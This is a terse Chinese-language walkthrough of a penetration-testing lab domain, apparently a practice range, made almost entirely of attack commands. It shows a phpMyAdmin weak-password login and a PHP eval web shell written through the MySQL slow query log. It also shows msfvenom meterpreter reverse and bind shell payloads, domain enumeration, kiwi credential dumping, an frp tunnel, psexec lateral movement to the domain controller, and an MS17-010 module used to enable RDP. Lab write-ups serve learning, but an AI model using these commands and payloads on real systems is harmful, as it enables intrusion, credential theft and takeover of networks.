kali:192.168.111.111(NAT)
win7:192.168.111.142(NAT),192.168.52.143(VMnet3)
2008:192.168.52.138(VMnet3)
2003:192.168.52.141(VMnet3)
信息收集
端口扫描
目录爆破
phpmyadmin弱口令root:root,登录phpmyadmin后执行sql语句写shell
set global slow_query_log=1;
set global slow_query_log_file='C://phpStudy//WWW//shell.php'; #phpinfo泄露绝对路径
select '<?php @eval($_POST[cmd]);?>' or sleep(11);
msfvenom生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.111 lport=4444 -f exe -o shell.exe
通过哥斯拉上传后运行
msf上线
域内信息收集
net time /domain #获取域控域名
net view @查看域内主机的名称
获取域内主机ip
ping OWA -n 1
ping ROOT-TVI862UBEH -n 1
net group "domain controllers" /domain #得到域控制器主机名
进程注入获取system权限
读取明文密码
load kiwi
creds_kerberos
利用frp建立socks隧道
利用psexec上线域控
#生成木马
msfvenom -p windows/meterpreter/bind_tcp rhost=192.168.52.138 lport=4444 -f exe -o shell.exe
#连接域控
proxychains4 impacket-psexec god.org/administrator@192.168.52.138
lput /tmp/shell.exe
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.52.138 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
利用auxiliary/admin/smb/ms17_010_command开3389 上线
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
proxychains4 rdesktop 192.168.52.141